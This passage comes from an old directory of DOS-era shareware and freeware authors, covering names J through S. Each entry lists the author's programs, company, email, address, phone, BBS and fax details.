Peter Jennings +Program: MagicKey TSR Internet autotyper, BEAM maps, DailyWord +Company: Jennings Communications, Inc +Email: peterj@netcom.com +WWW: +Address: Box 336, Ben Lomond, CA, USA 95005 +Voice: +1 408 336-3503 +Fax: +1 408 336-3503 (autoswitch) +FTP: ftp.netcom.com:/pub/VE3SUN +WWW: ftp://ftp.netcom.com:/pub/VE3SUN/www/home.html +Other info: HamBase and amateur radio utilities. Stereograms. + + +Key: Jeong, Joohee +Author: Joohee Jeong +Program: jspell, spell-checker w/ TeX-ability +Company: Nemosoft Technologies +Email: 73072.3651@compuserve.com +WWW: +Address: P.O.Box 1619, El Cerrito, CA 94530-9998, U.S.A. +Voice: (510) 528-8753 +BBS: +Fax: (510) 528-8753 +Other info: + + +Key: Johansson, Anssi +Author: Anssi Johansson +Program: Utils for UltraBBS - bulletins, filebase editing tools.. +Company: High Volume Software +Email: avij@under.nullnet.fi +WWW: http://www.ppoy.fi/~avij/ +Address: Ratatie 6, FIN-29250 Nakkila, Finland +Voice: +358-39-53741471 +BBS: +358-39-5374311 - Underground UBBS - 5 lines +Fax: +358-39-5374265 +Other info: European UltraBBS support, see http://www.ppoy.fi/~avij/ + + +Key: Johnson, Thomas C. +Author: Thomas C. Johnson +Program: PC-TRACK 3D Satellite Orbit Visualization Tool +Company: Acme Workshops +Email: 71371.1257@compuserve.com +WWW: +Address: 9920 S. Palmer Rd., New Carlisle, Oh. 45344, USA +Voice: (513) 878-9174 +BBS: +Fax: +Other info: Also Author of Master Chef: Recipe, Diet & Sched Tool + + +Key: JP Software Inc. +Author: JP Software Inc. +Program: 4DOS +Company: JP Software Inc. +Email: 75300.210@compuserve.com, 75300.1215@compuserve.com +WWW: +Address: P.O. Box 1470, East Arlington, MA 02174, USA +Voice: (617) 646-3975 +BBS: +Fax: (617) 646-0904 +Other info: + + +Key: Jung, Robert +Author: Robert K Jung +Program: ARJ archiver program +Company: +Email: robjung@world.std.com, 72077.445@compuserve.com +WWW: +Address: 2606 Village Road West, Norwood, Mass. 02062, USA +Voice: +BBS: (617) 354-8873; Fidonet 1:16/390.7 +Fax: +Other info: + + +Key: Kiernan, John +Author: J. A. Kiernan +Program: MOLWT. Simple chemical calculations at the DOS prompt. +Company: +Email: jkiernan@julian.uwo.ca +WWW: +Address: Anatomy Dept, Univ. of Western Ontario, London, Canada N6A 5C1 +Voice: (519) 679-2111 +BBS: +Fax: (519) 661-3936 +Other info: Also NEUROTUT (Human Neuroscience tutorial program) + + +Key: Kim, Eugene +Author: Eugene Kim +Program: GRAF-IT! v2.0 Inequality grapher +Company: Harvard University +Email: eekim@husc.harvard.edu +WWW: +Address: +Voice: +BBS: +Fax: +Other info: Snailmail address and phone numbers changes constantly. + + +Key: Kirsch, Dave +Author: Dave Kirsch +Program: MOU--Turbo C & Pascal, MSC TRUE mouse cursor routines +Company: None +Email: Zoid@mindlink.bc.ca +WWW: +Address: #801-9835 King George Hwy, Surrey, BC. Canada V3T 5H6 +Voice: (604) 585-8844 +BBS: (604) 576-1214 +Fax: (604) 534-7473 +Other info: Freeware mouse routines (w/src). + + +Key: Kirschbaum, David P +Author: David Kirschbaum +Program: Unix-compatible uuencode/decode for MS-DOS +Company: Toad Hall +Email: kirschd@ljl.com +WWW: +Address: 7573 Jennings Drive, Fayetteville NC 28303, USA +Voice: (910) 868-3471 +BBS: +Fax: +Other info: Full 80x88 .ASM source included. + + +Key: Knudson, Chad +Author: Chad Knudson +Program: CKWare Utilities +Company: CKWare +Email: knudson@cs.und.nodak.edu +WWW: +Address: 2398 30th Avenue South #403, Grand Forks, ND 58201-6594, USA +Voice: (701) 746-9849 +BBS: (701) 775-1143 +Fax: (701) 777-2940 +Other info: Written numerous utilities for DOS and BBSses + + +Key: Koornneef, Jim +Author: Jim Koornneef +Program: Save$ (CDN) - Easy RRSPs, Mutual Funds, Mortgages +Company: Golden Crater Software +Email: fnord@cml.com +WWW: +Address: 4380 Wellington Rd. Box 42014, London, Ont. Can. N6E 3V1 +Voice: (519) 637-2137 +BBS: +Fax: +Other info: Specialize in data compression libraries + + +Key: Kovach, Warren L. +Author: Dr. Warren L. Kovach +Program: MVSP - A MultiVariate Statistical Package +Company: Kovach Computing Services +Email: warrenk@cix.compulink.co.uk, 100016.2265@compuserve.com +WWW: +Address: 85 Nant-Y-Felin, Pentraeth, Anglesey, Wales LL75 8UY UK +Voice: +44 (0248) 450414 +BBS: +Fax: +Other info: + + +Key: Koziol, Quincey +Author: Quincey Koziol +Program: NCSA Telnet for the PC +Company: National Center for Supercomputing Applications (NCSA) +Email: koziol@ncsa.uiuc.edu +WWW: +Address: 605 E. Springfield Ave., Champaign, Ill., 61820, USA +Voice: (217) 244-0705 +BBS: +Fax: (217) 244-1987 +Other info: + + +Key: Krehbiel, Courtney +Author: Courtney Krehbiel +Program: ABC Fun Keys +Company: Lazelle +Email: courtney@cts.com 72341,2033@compuserve.com +WWW: +Address: P.O. Box 231505, Encinitas, CA 92023-1505, USA +Voice: (619) 436-1012 +BBS: (619) 436-3525 +Fax: +Other info: + + +Key: Lazarus, Ross +Author: Dr Ross Lazarus +Program: NetBday - A Netware login birthday reminder package +Company: +Email: ross@westmead.health.su.oz.au +WWW: +Address: 29 Francis St. Bondi, NSW 2026, Australia +Voice: +61 2 633 7946 +BBS: +Fax: +Other info: + + +Key: Ledbetter, Keith +Author: Keith Ledbetter +Program: SST: the Supersonic Search Tool (a "whereis") +Company: +Email: 72240.1221@compuserve.com +WWW: +Address: 4240 Ketcham Drive, Chesterfield, VA 23832, USA +Voice: (804) 674-0780 (6pm - 10pm Eastern Time) +BBS: +Fax: +Other info: + + +Key: Lee, Gene +Author: Gene W. Lee +Program: COSMOS planetarium simulator +Company: Lee Enterprises Inc. +Email: lee@convex.com +WWW: +Address: 4309 Peggy Lane, Plano Texas, 75074, USA +Voice: (214) 516-4732 +BBS: +Fax: +Other info: + + +Key: Lee, Patrick +Author: Patrick Lee +Program: CatQWK, QWK Layout, QWK Product Listing +Company: +Email: patlee@panix.com +WWW: +Address: 60-06 79th Street, Elmhurst, NY 11373-5314, USA +Voice: (718) 639-6696 +BBS: (212) 496-8324 +Fax: (718) 639-6696 not automatic +Other info: + + +Key: Lewis, Dan +Author: Dan Lewis +Program: Last Byte (Upper) Memory Manager +Company: Key Software Products +Email: dan.lewis@ksp.com +WWW: +Address: 440 Ninth Avenue, Menlo Park, CA 94025, USA +Voice: (415) 364-9847 +BBS: +Fax: +Other info: + + +Key: Lockrey, Brian +Author: Brian Lockrey +Program: PC-Quizzer, PC-Piano Teacher +Company: Data Assist, Inc. +Email: brian@aiinet.com +WWW: +Address: 659 Lakeview Plaza Blvd, Suite H, USA +Voice: (614) 888-8088 +BBS: (614) 888-8056 +Fax: (614) 888-8072 +Other info: + + +Key: Loewy, Ron +Author: Ron Loewy +Program: HLPDK - Multi Platform Help Development Kit +Company: ISoft D&M +Email: 100274.162@Compuserve.Com, 76350.333@Compuserve.Com +WWW: +Address: P.O.Box 5517, Coralville IA 52241, U.S.A +Voice: (319) 351-8413 +BBS: +Fax: +Other info: Other hypertext converters are available. + + +Key: Mace, Donald +Author: Donald (D.L.) Mace +Program: RSA303D Relational Stock Analysis +Company: DLM Consulting +Email: 71171.500@compuserve.com +WWW: +Address: P. O. Box 867452 Plano, TX 75086 USA +Voice: +BBS: 214-596-5121 +Fax: +Other info: + + +Key: Maconochie, David +Author: DJ Maconochie +Program: DELPX03, Fast exponential fitting, time series utilites +Company: +Email: djm16@leicester.ac.uk +WWW: +Address: MSB, University Rd., Leicester, LE1 2HN, Britain +Voice: +BBS: +Fax: +Other info: + + +Key: Maddox, Gary +Author: Gary Maddox +Program: BLASTER Master +Company: +Email: 76711.547@compuserve.com +WWW: +Address: 1901 Spring Creek #315, Plano, TX 75023-4219, USA +Voice: +BBS: +Fax: +Other info: BLASTER Master has been updated regularly since 1990. + + +Key: Madison, W.G. +Author: W.G. (Bill) Madison +Program: ReadyRef Do-It-Yourself pop-up help for DOS +Company: W.G. Madison & Assoc., Ltd. +Email: bmadison@crl.com 73240.342@compuserve.com +WWW: +Address: 13819 Shavano Downs, San Antonio, Texas 78230-5811, USA +Voice: 210-492-2776 +BBS: +Fax: +Other info: FIDOnet bill madison 1:387/800 + + +Key: Madsen, Steven +Author: Steve Madsen +Program: BBSkit - BBS/door programmer's toolkit for TP6+ +Company: +Email: sjmadsen@nextsrv.cas.muohio.edu +WWW: +Address: 1888 Edith Marie Drive, Beavercreek, OH 45431 USA +Voice: +BBS: +Fax: +Other info: + + +Key: Mahlknecht, Greg +Author: Greg Mahlknecht +Program: SDES Screen Designer +Company: Vironix +Email: mahlknec@beastie.cs.und.ac.za +WWW: +Address: P.O. Box 347, Gillitts, 3603, South Africa +Voice: +31 764-3576 +BBS: +31 764-3377 +Fax: +Other info: + + +Key: Mai, Anthony +Author: Anthony Mai +Program: QuickStar Fax Pro +Company: Pennsylvania State University +Email: mai@phys.psu.edu +WWW: +Address: Box #28, 10 Vairo Blvd., State College, PA 16803 USA +Voice: 1-(814)867-3385 +BBS: +Fax: +Other info: + + +Key: Marks, Richard +Author: Richard Marks +Program: UUEXE encode/decode +Company: Unisys (work) +Email: rmarks@netaxs.com +WWW: +Address: 931 Sulgrave Lane, Bryn Mawr, PA 19010, USA +Voice: work (215) 993-7358, home (215) 525-8993 +BBS: +Fax: +Other info: + + +Key: Marson, Hamish +Author: Hamish Marson +Program: PSERV, Novell Accounting Print Server +Company: University of Waikato +Email: h.marson@waikato.ac.nz +WWW: +Address: Private Bag, Hamilton, New Zealand +Voice: 0064 7 8562889 +BBS: +Fax: 0064 7 8384066 +Other info: + + +Key: McAfee Associates +Author: McAfee Associates +Program: SCANV virus detection and identification, etc +Company: McAfee Associates +Email: mcafee@netcom.COM +WWW: +Address: 2710 Walsh Avenue, Suite 200, Santa Clara, + California 95051, USA +Voice: +1 (408) 988-3832 (M-F 7:30AM - 5:30PM GMT-7) +BBS: +1 (408) 988-4004 (US Robotics DS HST/v32/v42bis) +Fax: +1 (408) 970-9727 (Group III compatible) +Other info: Email contact person: Aryeh Goretsky + CompuServe address: 76702.1714@compuserve.com + CompuServe Forum: VIRUSFORUM + + +Key: McCaffrey, John +Author: John McCaffrey +Program: Amy! - LARGE character typing fun for infants & toddlers +Company: OPAL Network +Email: mccaffjt@perkin-elmer.com, 72360.2777@compuserve.com +WWW: +Address: 625 Overlook Drive, Cheshire, CT 06410-2122, USA +Voice: work (203) 761-2872, home (203) 250-0936 +BBS: (203) 250-0938, (203) 250-0942 +Fax: (203) 761-2892 +Other info: PC/Mac programmer: Database/RS232_Comm/Science/Education + + +Key: Menninger, William +Author: William L. Menninger (prefer Will) +Program: States geography quiz, Meval expression evaluator +Company: Massachusetts Institute of Technology +Email: willus@ilm.pfc.mit.edu (til 1/94) +WWW: +Address: 2162 Dudley St., Pasadena, CA 91104 (til 7/94), USA +Voice: (617) 253-8646 or (818) 797-1998 +BBS: +Fax: +Other info: The CA address is my wife's. I'll join her ~1/94 :-( + + +Key: Miettunen, Jouni +Author: Jouni Miettunen +Program: TooLate editors, Filex - filename extension identification +Company: +Email: jon@stekt.oulu.fi +WWW: +Address: Rautatienkatu 20 A 10, FIN-90100 Oulu, Finland, Europe +Voice: +(358)-81-3113258 +BBS: +Fax: +Other info: x2ftp.oulu.fi FTP site maintainer (MS-DOS) + + +Key: Mukherjee, Joy +Author: Joy Mukherjee +Program: X-Master - shell to use CMF,ROL,MOD from ZIP/ARJ/LZH's +Company: None +Email: jmukher@lonestar.utsa.edu +WWW: +Address: 202 Vanderheck, San Antonio, TX, 78209-4045, USA +Voice: Not disclosed +BBS: (210) 648-3702 +Fax: (210) 820-3080 +Other info: + + +Key: Murdoch, Duncan +Author: Duncan Murdoch +Program: Turbo Pascal utilities +Company: +Email: dmurdoch@mast.QueensU.CA +WWW: +Address: 337 Willingdon Ave., Kingston, Ontario, Canada, K7L 4J3 +Voice: +BBS: Fidonet 1:249/99.5 +Fax: +Other info: Edits Borland/Turbo Pascal unofficial bug list + + +Key: Nelson, Russell +Author: Russell Nelson +Program: Crynwr packet driver collection - Ethernet drivers +Company: Crynwr Software +Email: info@crynwr.com +WWW: +Address: 11 Grant St.,Potsdam, NY 13676, USA +Voice: (315) 268-1925 +BBS: +Fax: (315) 268-9201 +Other info: + + +Key: Newlin, John +Author: John Newlin +Program: ArcMaster - File compression system manager +Company: New-Ware +Email: CIS 71535,665 +WWW: +Address: 8050 Camino Kiosco, San Diego, CA 92122, USA +Voice: (619) 455-6225 +BBS: (619) 455-5226 +Fax: +Other info: + + +Key: Nguyen, Hoa +Author: Hoa Gia Nguyen +Program: VIET Vietnamese word processor for MS-DOS +Company: VIETech +Email: VIETech@haydn.stanford.edu, nguyenh@nosc.mil +WWW: +Address: P.O. Box 3834, La Mesa, CA 91944, USA +Voice: +BBS: +Fax: +Other info: + + +Key: Ni, Hongbo +Author: Hongbo Ni +Program: NJSTAR Chinese and Japanese Word Processor +Company: Hongbo Data Systems +Email: 100032.2724@compuserve.com +WWW: +Address: P.O. Box 40, Epping NSW 2121, Australia +Voice: +61-2-869-0821 +BBS: +Fax: +61-2-869-0823 +Other info: NJSDK (C Lib.) Chinese Software Development Kit Available + + +Key: Noorda, Brent +Author: Brent Noorda +Program: CEnvi for DOS, C-like script language intepreter +Company: Nombas +Email: bsn@world.std.com, 72212.1622@compuserve.com +WWW: +Address: P.O. Box 875, Medford, MA 02155, USA +Voice: (617) 391-6595 +BBS: (617) 391-6595 +Fax: +Other info: CEnvi also avialable for Windows and OS/2 + + +Key: Nugent, Gary +Author: Gary Nugent +Program: JUPSAT21 Jovian Satellite Simulator with animation +Company: None +Email: gnugent@cara.ie, M4450@eurokom.ie +WWW: +Address: 54a Landscape Park, Churchtown, Dublin 14, Ireland. +Voice: +BBS: +Fax: +Other info: + + +Key: Olowofoyeku, Abimbola +Author: Olowofoyeku Abimbola +Program: AUTO-CONFIG Automatic system configuration manager +Company: +Email: laa12@seq1.keele.ac.uk +WWW: +Address: 268 Horwood, Newcastle, Staffs ST5 5BQ, England +Voice: +44 (0782) 629850 +BBS: +Fax: +Other info: aka The African Chief + + +Key: Ozeran, James +Author: James Daniel (Dan) Ozeran +Program: Enzkin - Enzyme Kinetics Calculations for Steady State + Rate Equations +Company: University of Chicago, Department of Biochemistry +Email: dan-ozeran@uchicago.edu` +WWW: +Address: 5841 S. Maryland Ave, MC5058, Chicago, IL 60637 USA +Voice: (312) 702-9355 +BBS: +Fax: (312) 702-9234 +Other info: + + +Key: Pardun, Gary +Author: Gary Pardun +Program: BuildPRD Build MS Word Printer Driver +Company: Gary Pardun Consulting +Email: cpardun@matt.ksu.ksu.edu +WWW: +Address: 1540 Waterford Place, #3, Manhattan, KS 66502-0417, USA +Voice: (913)539-5355 +BBS: (upon request) +Fax: (upon request) +Other info: + + +Key: Patri-Soft +Author: Norm Patriquin +Program: PCOPY copier & other Patriquin utilities +Company: Patri-Soft +Email: 76347.2477@compuserve.com +WWW: +Address: 5225 Canyon Crest Drive Suite 71-358, + Riverside, CA 92507, USA +Voice: 714-352-2820 +BBS: 714-352-2825 +Fax: 714-352-1527 +Other info: + + +Key: Paulson, Duane +Author: Duane Paulson +Program: RES13 Resident Screen Decoder +Company: +Email: duanep@holonet.net 70671.666@compuserve.com +WWW: +Address: 1317 W. 11th St, Santa Ana, CA 92703, USA +Voice: +BBS: +Fax: +Other info: + + +Key: PCMAG +Author: PC Magazine +Program: PC Magazine utilities +Company: Ziff Communications Company +Email: 72241.104@compuserve.com +WWW: http://www.pcmag.ziff.com +Address: One Park Avenue, New York, NY 10016, USA +Voice: 1(800)289-0429 +BBS: 1(617)231-4450 +Fax: 1(212)503-5799 +Other info: FTP server at ftp://ftp.pcmag.ziff.com/pub/pcmag + + +Key: Perkovic, David +Author: David Perkovic +Program: The Brain. Neural Network Simulator +Company: DP Computing +Email: dpc@mep.com, perkovic@cleese.apana.org.au +WWW: +Address: PO Box 712, Noarlunga Center SA 5168, Australia +Voice: +61 8 326 4364 +BBS: +Fax: +Other info: Compiling a list of BBSes accepting uploads via email. + + +Key: Pfeiffer, Peter +Author: Peter Pfeiffer +Program: SPLog - State of the art Ham Radio Logging Software; etc +Company: (ABS) Alpha Business Software and Atomic Energy of Canada Limited +Email: pfeiffer@cu73.crl.aecl.ca or pfeiffer@cu51.crl.aecl.ca +WWW: +Address: 3 Claremount Dr, Deep River, Ontario, K01 1P0, Canada +Voice: (613) 584-9207 +BBS: +Fax: (613) 584-9070 +Other info: Commercial and Shareware Software Development. + + +Key: PKWare Inc. +Author: PKWare Inc. (Phil Katz) +Program: PKZIP file compressions system; PKLITE +Company: PKWare Inc. +Email: support@pkware.com +WWW: +Address: 9025 N. Deerwood Drive, Brown Deer, WI 53223 USA +Voice: 414-354-8699 +BBS: 414-354-8670 +Fax: 414-354-8559 +Other info: Email contact person Mark Gresbach + + +Key: Pluimers, Jeroen +Author: Jeroen W. Pluimers +Program: UpCONV - Pascal case conversion utility +Company: P.S.O. (Pluimers Software Ontwikkeling) +Email: jeroenp@rulfc1.LeidenUniv.nl +WWW: +Address: P.O. Box 266, 2170 AG Sassenheim, THE NETHERLANDS +Voice: +31-2522-20908 +BBS: +31-2522-20050 (HST/DS, 24 hrs a day) +Fax: none +Other info: + + +Key: Podnos, Vladimir +Author: Vladimir Podnos & team +Program: ELCUT Finite Element Analysis System +Company: TOR Co-operative Enterprise +Email: podnos@tor.spb.su +WWW: +Address: 6, Uglovoj per., St.Petersburg, 198052, Russia +Voice: (812) 292-1965 +BBS: +Fax: (812) 110-1334 +Other info: analyzes 2D Electro-Magnet, Stress/Strain, Thermal Fields + + +Key: Pollet, Patrick +Author: Patrick Pollet +Program: TURTLE Turtle graphic unit in any BGI mode +Company: INSA Villeurbanne France +Email: ppollet@cismibm.univ-lyon1.fr +WWW: +Address: INSA Bat 110 , 20 Av. Einstein 69621 Villeurbanne Fr +Voice: 72 43 83 80 +BBS: +Fax: 72 43 85 33 +Other info: + + +Key: Presno (de Presno), Odd +Author: Odd de Presno +Program: The Online World - handbook +Company: +Email: opresno@extern.uio.no or presno@grida.no +WWW: +Address: 4815 Saltrod, Norway +Voice: + 47 370 31204 +BBS: + 47 370 31378 +Fax: + 47 370 27111 +Other info: gopher cosn.org (Networking Information / Reference) + + +Key: Pritchett, Ron +Author: Ron Pritchett +Program: (2DAPNT) 2DaPoint, 4D Fido Netmail packer +Company: Realm Software +Email: pritchet@ash.cs.scarolina.edu +WWW: +Address: 1208 Bush River Rd #H4, Columbia, SC 29210, USA +Voice: 1-(803)-772-8205 +BBS: 1-(803)-731-2510 +Fax: +Other info: + + +Key: Pultz, Scott +Author: Scott H. Pultz +Program: SPMORF Morphing program for MS-DOS +Company: +Email: scott@eskimo.com +WWW: +Address: 114-168th AVE NE, Bellevue, WA 98008, USA +Voice: (206)746-4799 +BBS: +Fax: +Other info: + + +Key: QuickWare +Author: Bill Alexander, Bill Brinson +Program: Q387 Math Accelerator and Emulator +Company: QuickWare +Email: 70750.2147@compuserve.com +WWW: +Address: P.O. Box 684652, Austin, Texas 78768, USA +Voice: (512) 280-1452 +BBS: none +Fax: (713) 961-4438 (orders only) +Other info: Runs all AutoCADs without a 387/487, speeds up others. + + +Key: Reeve, Alan +Author: Alan Reeve +Program: MacSEE read/white Mac files on PC +Company: REEVEsoft +Email: reevesoft@delphi.com or 71521.2200@CompuServe.com +WWW: +Address: REEVEsoft, P.O. Box 1884, Clemson SC 29633 USA +Voice: (803) 654-7378 +BBS: None +Fax: None +Other info: None + + +Key: Reilley, Peter +Author: Peter Reilley +Program: BEAV Binary Editor And Viewer +Company: +Email: pvr@wang.com +WWW: +Address: 19 Heritage Cir., Hudson, N.H. 03051, USA +Voice: +BBS: +Fax: +Other info: + + +Key: Revie, Dennis +Author: Dennis Revie +Program: VAR Grade - Comprehensive grade entry, analysis, stats +Company: VARed Software +Email: 73427.112@Compuserve.com +WWW: +Address: 1490 Calle Fidelidad, Thousand Oaks, CA 91360-6819 USA +Voice: (805) 523-7546 +BBS: +Fax: +Other info: VAR Grade is a teacher's grading program + + +Key: Risku, Kai +Author: Kai Risku +Program: FFIT, Optimally copies files to disks (knapsack) +Company: +Email: Kai.Risku@hut.fi +WWW: +Address: Kronvik, 65410 Sundom, Finland +Voice: +358-61-3571343 +BBS: +Fax: +Other info: + + +Key: Rollason, Jeff +Author: Jeff Rollason +Program: PocketD Plus advanced file manager and CRUSH compressor +Company: PocketWare +Email: 100031.3537@compuserve.com +WWW: +Address: P.O. Box 2369, Hendon, London NW4 1NR, England +Voice: +44 81 203 3731 +BBS: +Fax: +Other info: + + +Key: Rosenthal, Doren +Author: Doren Rosenthal +Program: UnStal01,VirSim2C,WinLite1,Cleaner1,SysMon30,Master20 +Company: Rosenthal Engineering +Email: as194@cleveland.freenet.edu +WWW: +Address: P.O.Box 1650 San Luis Obispo, CA USA 93406 +Voice: 1 - (805) 541-0910 +BBS: +Fax: Call voice line first +Other info: Member ASP and ASAD + + +Key: Roshal, Eugene +Author: Eugene Roshal +Program: RAR multifunctional integrated archive manager +Company: +Email: Eugene_Roshal@p0.f23.n5010.z2.fidonet.org +WWW: +Address: Gagarina 21-15, 454010, Chelyabinsk, Russia +Voice: +BBS: +7-3512-656522 +Fax: +7-3512-654920 +Other info: Contact for registration to Ron Dwight 2:220/22 + + +Key: Rossmann, Andrew +Author: Andrew Rossmann +Program: INFOPLUS +Company: +Email: andyross@infopls.chi.il.us +WWW: +Address: +Voice: +BBS: (708) 537-0247 +Fax: +Other info: + + +Key: Rothenburg, Robert Walking-Owl +Author: Robert Rothenburg Walking-Owl +Program: Fork (DOS stdout/redirection splitter) +Company: +Email: robert.rothenburg@asb.com, rrothenb@ic.sunysb.edu +WWW: +Address: P.O. Box 1327, South Stony Brook, NY 11790-0951 USA +Voice: +BBS: +Fax: +Other info: + + +Key: Roub, Paul +Author: Paul Roub +Program: SALT Learn utility (SLEARN), TelixFonEditor (TFE) +Company: +Email: proub@bix.com +WWW: +Address: PO Box 141583, Coral Gables, FL 33114-1583, USA +Voice: +BBS: +Fax: +Other info: + + +Key: Rovers, Perry +Author: Perry Rovers +Program: FTP-LIST, List of FTP sites that accept Anonymous access +Company: +Email: Perry.Rovers@kub.nl +WWW: +Address: Prof. Rogierhof 7, 5014 NT, Tilburg, The Netherlands (home) +Voice: +31-13-662288 (work) +BBS: +Fax: +Other info: Additions/updates/comments only please. No unsollicited ads etc. + + +Key: Rowe, Eddie +Author: Eddie Rowe +Program: NoSnail - Netmail for RBBS-PC (Fidonet technology related) +Company: +Email: 931ROWE@MERLIN.NLU.EDU +WWW: +Address: Northeast La Univ., NLU Box 5052, Monroe, La. 71212, USA +Voice: (318) 251-3799 +BBS: (318) 255-4710 +Fax: +Other info: Fidonet#1:380/14 + + +Key: Salmi, Timo +Author: Prof. Timo Salmi +Program: TS-programs, FAQs, information lists +Company: Department of Accounting & Finance, University of Vaasa +Email: ts@uwasa.fi +WWW: http://www.uwasa.fi/~ts +Address: P.O.Box 700, FIN-65101 Vaasa, Finland +Voice: +(358)-61-3248111 +BBS: +(358)-61-3170972 Walli BBS (domestic only) +Fax: +(358)-61-3248344 +Other info: garbo.uwasa.fi FTP site moderator (MS-DOS, publicity) + Co-moderator of comp.archives.msdos.announce newsgroup + + +Key: Salvisberg, Hans +Author: Hans Salvisberg +Program: BOOT.SYS -- The Heavy-duty Configuration Manager +Company: Salvisberg Software & Consulting +Email: 73237.3556@compuserve.com +WWW: +Address: Bellevuestr. 18, CH-3095 Berne, SWITZERLAND +Voice: +BBS: +Fax: +41-31-972-42-10 +Other info: + + +Key: Sankey, Todd +Author: Todd Sankey +Program: TDS directory sorter +Company: +Email: sankey@physics.ubc.ca +WWW: +Address: 201 - 2345 W.5th Ave Vancouver, BC, Canada +Voice: (604) 733-1056 +BBS: +Fax: +Other info: + + +Key: Schaefer, Arno +Author: Arno Schaefer +Program: FIPS nondestructive partition split utility +Company: +Email: schaefer@rbg.informatik.th-darmstadt.de +WWW: +Address: Hainertrift 54, 63303 Dreieich, Germany +Voice: +49-6103-699967 +BBS: +Fax: +49-6103-699967 +Other info: + + +Key: Schikore, Daniel +Author: Daniel (Dan) Schikore +Program: The Danix Utilities +Company: N/A +Email: drs@cs.purdue.edu +WWW: +Address: 1983 Greenheath Dr., Florissant, MO 63033, USA +Voice: (314) 839-0709 +BBS: +Fax: +Other info: + + +Key: Schipper, Jeroen +Author: Jeroen Schipper +Program: READMAIL, A message reader for the PC +Company: +Email: jschipper@hut.nl +WWW: +Address: +Voice: +BBS: +Fax: +Other info: + + +Key: Schmidt, Robert +Author: Robert Schmidt +Program: TWEAK for VGA, XINTRO Introduction to VGA mode X +Company: Norwegian Institute of Technology +Email: robert@idt.unit.no +WWW: +Address: HK 25-51, N-7035 Trondheim, NORWAY +Voice: +47 73 88 70 36 +BBS: +Fax: +Other info: + + +Key: Schroeder, W.F. +Author: W.F.(Django) Schroeder DL5YEC +Program: HamComm: ham radio, send/receive rtty and cw w/o modem +Company: Siemens Nixdorf Informationssysteme AG Paderborn +Email: schroeder.pad@sni.de +WWW: +Address: Augsburger Weg 63, 4790 Paderborn, Germany +Voice: +49 5251 48 9 88 +BBS: packet radio: DL5YEC@DB0BQ.DEU.EU +Fax: +49 5251 828 509 +Other info: + + +Key: Schull, Jonathan +Author: Jonathan Schull +Program: SoftLock Document and Programmers' ToolKits +Company: SoftLock Services, Inc. +Email: Schull@SoftLock.com; Intro@SoftLock.com +WWW: +Address: 963 East Ave., Rochester, NY 14607-2251, USA +Voice: (716) 242-0348 +BBS: (in-house only) +Fax: (716) 242-0348 +Other info: Automated sales, distribution for all! + + +Key: Schulz, Russell +Author: Russell Schulz +Program: RusNews, naproc, procc (Waffle newsreader, utilities) +Company: +Email: russell@alpha3.ersys.edmonton.ab.ca +WWW: +Address: +Voice: +BBS: +Fax: +Other info: primary ftp for these+other Waffle utils: halcyon.com + + +Key: Scott, Peter +Author: Peter Scott +Program: HYTELNET Instant-access to telnet login sites +Company: University of Saskatchewan Libraries +Email: scott@sklib.usask.ca +WWW: +Address: College Dr.,Saskatoon, Sask, Canada, S7N 0W0 +Voice: (306) 966-5920 +BBS: +Fax: (306) 966-6040 +Other info: + + +Key: SemWare Inc. +Author: SemWare +Program: QEdit (Advanced, TSR, and OS/2) +Company: SemWare +Email: tech.support@semware.atl.ga.us +WWW: + 75300.2710@compuserve.com + richard.blackburn@semware.atl.ga.us +Address: 4343 Shallowford Rd Ste. C3A, Marietta, GA 30062-5022, USA +Voice: (404)641-9002 +BBS: (404)641-8968 +Fax: (404)640-6213 +Other info: + + +Key: Shearer, Dan +Author: Dan Shearer +Program: CHECKSYS system config tester, USE prog for LAN managers +Company: University of South Australia +Email: ccdps@lux.levels.unisa.edu.au +WWW: +Address: 70 Third Avenue, St Peters, South Australia 5069, Australia +Voice: +61 8 362 9529 +BBS: +Fax: +61 8 362 9529 +Other info: + + +Key: Shippony, Zvi +Author: Zvi Shippony +Program: MAFIA - Math utilities package +Company: Jet Propulsion Laboratory (JPL) +Email: zvi@hipp.jpl.nasa.gov or: zvi@thak.jpl.nasa.gov +WWW: +Address: 4800 Oak Grove Dr., Pasadena, CA, 91109, U.S.A. +Voice: (818) 354-1687 +BBS: +Fax: +Other info: Home: 4822 Tilden Ave. Sherman Oaks, CA, 91423 + + +Key: Shmakov, Sergey +Author: Sergey Yurievich Shmakov +Program: RSC Resident Scientific Calculator +Company: Join Institute of Nuclear Research +Email: evsikov@lcta9.jinr.dubna.su +WWW: +Address: P.O. Box 79, Head Post Office Moscow 101000 Russia +Voice: (221) 4-52-09 +BBS: +Fax: +Other info: + + +Key: Siebeck, Wolfgang +Author: Wolfgang Siebeck +Program: PCElm 3.01 and above +Company: RMI Nachrichtentechnik GmbH +Email: siebeck@infoac.rmi.de +WWW: +Address: P.O.Box 1526, D-5100 Aachen, Germany +Voice: +49 241-47997-22 +BBS: +Fax: +49 241-47997-77 +Other info: + + +Key: Sill, Daniel +Author: Daniel A. Sill & Stephen L. Balkum +Program: SVGAxx2x Super VGA Graphics Libraries For BASIC/C/C++ +Company: Zephyr Software +Email: sill@zoe.as.utexas.edu, balkum@zoe.as.utexas.edu +WWW: +Address: P.O. Box 7704, Austin, Texas 78713-7704, USA +Voice: (512) 280-7705 M-F 5pm-9pm, Sa-Su 10am-9pm CST/CDT +BBS: +Fax: +Other info: + + +Key: Silva, John +Author: John P. Silva +Program: SVGA Fast Truecolor Image Viewer +Company: +Email: jsilva@netcom.com +WWW: +Address: 3429 Maywood Dr., Richmond, CA 94803, USA +Voice: (510) 222-9255 +BBS: +Fax: +Other info: + + +Key: Singh, Manjit +Author: Manjit (Manu) Singh +Program: Supreme Utility - multiple command file utility +Company: SupremeSoft +Email: msingh@ucs.indiana.edu +WWW: +Address: 105 Deerfield Drive, Easton, CT 06612-1106, U.S.A. +Voice: (203) 261 - 7510 or (812) 331 - 8379 +BBS: (812) 824 - 8682 +Fax: +Other info: + + +Key: Skinner, Roland +Author: Roland Skinner +Program: QUIKCOPY Quick file and diskette copier for DOS. +Company: RJS Software +Email: rjs@leclub.co.za, roland@cs.wits.ac.za +WWW: http://www.cs.wits.ac.za/~roland +Address: P.O. Box 14134, Bredell, 1623, Republic of South Africa +Voice: +27-(0)11-716-4486 (GMT+2, office hours only) +BBS: LeClub BBS +27-(0)11-315-3477 +Fax: +27-(0)11-794-1490 +Other info: + + +Key: Skulason, Fridrik +Author: Fridrik (Frisk) Skulason +Program: F-PROT anti-virus program +Company: Frisk Software International +Email: frisk@complex.is +WWW: +Address: Postholf 7180, IS-127 Reykjavik, Iceland +Voice: +BBS: 